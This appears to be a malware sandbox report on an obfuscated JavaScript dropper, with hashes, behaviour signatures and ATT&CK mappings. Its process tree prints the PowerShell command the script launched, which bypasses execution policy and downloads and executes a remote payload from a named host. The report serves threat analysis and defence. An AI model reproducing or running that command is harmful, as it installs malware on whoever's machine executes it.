54596915c165e9ae886479fc31be46e2dceb96fd5ccf8ee5f066a3c14aff0cb8

Analysis

max time kernel
118s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
05-03-2024 02:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

54596915c165e9ae886479fc31be46e2dceb96fd5ccf8ee5f066a3c14aff0cb8.js
Size

71KB
MD5

cc08bba3fcc009404a73f005bc9c1415
SHA1

d97b5735a4f8894cbb35bce8a1d4951b474bb83b
SHA256

54596915c165e9ae886479fc31be46e2dceb96fd5ccf8ee5f066a3c14aff0cb8
SHA512

92b8f6f3a21de96c3b677cfea6e13cc25478a78bc75b745fad7807a64a8f9bc0fbb722b53449ff2a825ba698f9a40bb9667157579ff77f2387cd86c0266f5775
SSDEEP

1536:JjEZbBm6Ei/98xM1OS95FlmheJi1D46IMayMP+vq:JYfZoS95FlmoJil46IManP+C

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://compactgrill.hu/care.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	3044	powershell.exe
4	3044	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3044	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3044	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 3044	2216	wscript.exe	28
PID 2216 wrote to memory of 3044	2216	wscript.exe	28
PID 2216 wrote to memory of 3044	2216	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\54596915c165e9ae886479fc31be46e2dceb96fd5ccf8ee5f066a3c14aff0cb8.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3044-4-0x000000001B380000-0x000000001B662000-memory.dmp

Filesize
2.9MB

Download
memory/3044-5-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/3044-7-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download
memory/3044-6-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/3044-8-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/3044-9-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/3044-10-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/3044-11-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/3044-12-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/3044-13-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/3044-14-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download